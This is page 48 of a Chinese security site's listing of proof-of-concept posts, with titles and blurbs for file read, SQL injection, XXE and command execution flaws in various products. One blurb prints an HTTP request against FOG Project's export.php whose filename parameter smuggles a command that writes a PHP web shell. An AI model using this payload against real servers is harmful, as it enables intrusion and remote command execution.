POC 第48页
【通用】Flowise AI 系统attachments任意文件上传 CVE-2025-26319_秃兔安全
【通用】时空智友企业信息管理系统  getStudioFile 任意文件读取_秃兔安全

【通用】时空智友企业信息管理系统 getStudioFile 任意文件读取

fofa语句 yakit插件 uuid poc yaml 已验证
dreamer292的头像_秃兔安全至尊玉兔dreamer29211个月前
08814
【通用】金和JC6 ActionDataSet 存在XXE_秃兔安全

【通用】金和JC6 ActionDataSet 存在XXE

fofa语句yakit 插件 uuidpocyaml已验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer29210个月前
010312
【通用】傲发办公通信专家 Checkingin  SQL注入_秃兔安全

【通用】傲发办公通信专家 Checkingin SQL注入

fofa语句pocyaml已验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2929个月前
01069
【2025特殊通用】华天软件Inforcenter PLM  文件读取_秃兔安全

【2025特殊通用】华天软件Inforcenter PLM 文件读取

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
07814
【2025特殊通用】Easy7监控平台 downloadResource  文件读取_秃兔安全

【2025特殊通用】Easy7监控平台 downloadResource 文件读取

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
0855
【通用】WPS文档中心 etc-doperate 未授权访问_秃兔安全

【通用】WPS文档中心 etc-doperate 未授权访问

fofa语句yakit插件 uuidpocyaml懒得验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2927个月前
01039
【通用】 nginxWebUI getAuth 命令执行_秃兔安全

【通用】 nginxWebUI getAuth 命令执行

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01025
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞_秃兔安全